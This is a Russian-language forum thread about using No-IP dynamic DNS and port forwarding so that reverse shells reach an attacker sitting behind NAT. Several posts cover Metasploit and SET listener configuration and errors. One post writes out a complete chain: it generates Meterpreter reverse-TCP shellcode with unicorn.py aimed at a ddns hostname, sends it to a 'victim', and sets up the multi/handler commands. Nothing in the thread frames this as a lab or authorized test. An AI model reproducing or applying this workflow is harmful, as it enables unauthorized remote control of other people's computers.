No-IP, или что делать если ip не белый

[pazle]

Коллеги, добрый день.
Подскажите пожалуйста, как правильно использовать данный сервис.Какой-то момент в понимании ускользает момент установки соединения между двумя машинами в разных локальных сетях за NAT с использованием этого сервиса.
А) Как правильно сконфигурировать payload для атакующей машины за NAT провайдера?
Зарегистрировался на сервисе no-ip, выполнил настройки, получил адрес (для примера - pazle.mydomen).При тесте конфигурации, no-ip говорит что все порты настроены верно.
Настройки сети:
1) my.router 192.168.1.1 - роутер.В локальной сетке ему выдан адрес 1.20.35.22
Так же купил у провайдера выделенный ip с адресом 80.200.150.250 - как им пользоваться, тоже не могу разобраться.
2) 1.20.35.1 - лок.шлюз провайдера.
3) Далее трейсроут (делаю до ya.ru) идет так же на шлюз провайдера - synkrisis.domain.ru [22.110.85.45]
и затем на - msk-ix-m10.yandex.net [195.208.210.21].

Б) Пусть payload успешно доставлен и запущен.
Как узнать по какому адресу следует устанавливать соединение с атакуемой машиной? (именно данный момент я не могу уловить).
Как и где в этой цепочке используется no-ip?

Благодарю.

 

[DoberGroup]

между двумя машинами в разных локальных сетях за NAT

Зарегистрировался на сервисе no-ip,

Вы путаете серый адрес (немаршрутизируемый, за NAT) и динамический. No-IP помогает в случае динамического - если он сменится, домен будет указывать на текущий. Проблема с адресами за NAT решается пробросом портов. В случае NAT от собственного роутера - пробрасываете сами. Если NATит Вас провайдер - решаете с провайдером (как правило, покупкой внешнего IP). Те внутренние адреса, которые Вы приводите - адреса из пула Тайланда. Я не могу понять, Вы выпустили второй 0 (и тогда это будет серый адрес) или у Вас невнятный роутинг.

Как узнать по какому адресу следует устанавливать соединение с атакуемой машиной?

Если Вы не знаете адрес цели, если цель за маршрутизатором, если адрес цели динамический и может поменяться - используйте revers-сессии. Тогда эксплойт сам будет устанавливать соединение с вами

 

[pazle]

Вы путаете серый адрес (немаршрутизируемый, за NAT) и динамический. No-IP помогает в случае динамического - если он сменится, домен будет указывать на текущий. Проблема с адресами за NAT решается пробросом портов. В случае NAT от собственного роутера - пробрасываете сами. Если NATит Вас провайдер - решаете с провайдером (как правило, покупкой внешнего IP). Те внутренние адреса, которые Вы приводите - адреса из пула Тайланда. Я не могу понять, Вы выпустили второй 0 (и тогда это будет серый адрес) или у Вас невнятный роутинг.


Если Вы не знаете адрес цели, если цель за маршрутизатором, если адрес цели динамический и может поменяться - используйте revers-сессии. Тогда эксплойт сам будет устанавливать соединение с вами

Адреса исключительно ради примера.Я не понимаю, как должен пройти трафик.При генерации эксплойта я указываю свой внешний адрес 80.200.150.250 - внешний адрес роутера?Если Вам не сложно, подскажите пожалуйста настройки с приведенными выше адресами для revers сессии.

 

[pazle]

Пробую эксплойт с такими настройками (предварительно порт на машине открыл):

set> IP address for the payload listener (LHOST):80.200.150.250
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
Затем пробую установить сессию и вылезает ошибка:
[-] Handler failed to bind to 80.200.150.250:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
msf exploit(handler) >

 

[kot-gor]

Пробую эксплойт с такими настройками (предварительно порт на машине открыл):

set> IP address for the payload listener (LHOST):80.200.150.250
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
Затем пробую установить сессию и вылезает ошибка:
[-] Handler failed to bind to 80.200.150.250:443:-  -
[-] Handler failed to bind to 0.0.0.0:443:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
msf exploit(handler) >

Попробуйте добавить строчку следующего содержания
set ReverseListenerBinAddress (локальный ip)

 

[DmityiD]

Я использую ddclient, работает за nat и не только с no-ip. Гибкий в настройках. Если кому необходимо выложу конфигурации.

 

[for(i=0;i<225;i++);]

Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу

Ссылка скрыта от гостей

проходим регистрацию.
далее на этом же сайте скачиваем клиент.



Посмотреть вложение 7485




после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.


Посмотреть вложение 7486



Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) - Нажмите "y" чтобы обновить хост сейчас.


Посмотреть вложение 7488

Запускается no-ip командой командой no-ip2


Посмотреть вложение 7489


Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль???
[doublepost=1483822492,1483822335][/doublepost]

Я использую ddclient, работает за nat и не только с no-ip. Гибкий в настройках. Если кому необходимо выложу конфигурации.

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль??? и как пробросить роутер Zyxel Keenetic Lite III можно инструкцию???

 

[kot-gor]

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль???
[doublepost=1483822492,1483822335][/doublepost]

после установки программы я указал все дынные, оно работает!!Скажите после перезагрузки компа заново нужно будет вводить логин и пароль через консоль??? и как пробросить роутер Zyxel Keenetic Lite III можно инструкцию???

Если не добавили сервис в автозагрузку то да.

 

[Pushkinmazila]

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP

А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/

 

[Merkif]

Здравствуйте.
при вводе команд выдает ошибки
error runing command: Rex:: Timeouterror Operation timed out. С чем это может быть связано?
Особенно когда делаю скрины или же пытаюсь что либо загрузить.
[doublepost=1486710208,1486708753][/doublepost]и Сессия долго открывается минут 10-15
[doublepost=1486710879][/doublepost]пользуюсь no ip
[doublepost=1486711593][/doublepost]

А вот тут вот по подробнее плиз

Для создания полезной нагрузки я юзаю это https://codeby.net/threads/bystryj-sposob-poluchit-meterpreter.58440/

Для получения шелкода

python unicorn.py windows/meterpreter/reverse_tcp test.ddns.net 443

Шелкод бросаем "жертве"
и от руки в Метасплоите пишем.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST test.ddns.net
set LPORT 443
set REVERSELISTENERBINDADDRESS 192.168.88.5
exploit -j

[doublepost=1486711749][/doublepost]Ну и порт на роутере перебросить на локальный адрес.

 

[DoberGroup]

С чем это может быть связано?

С тем, что сессия умирает по таймауту. Его можно увеличить, но это не выход, конечно.
Создайте отдельную тему (это все же вопрос специфичный для metasploit), и покажите при установленной сессии вывод

meterpreter > getuid
и
meterpreter > ps

 

[jaguar]

No-IP
и файл попадает в автозагрузку?

 

[kot-gor]

No-IP
и файл попадает в автозагрузку?

как он попадет если вы не внесли его, чудес не бывает..)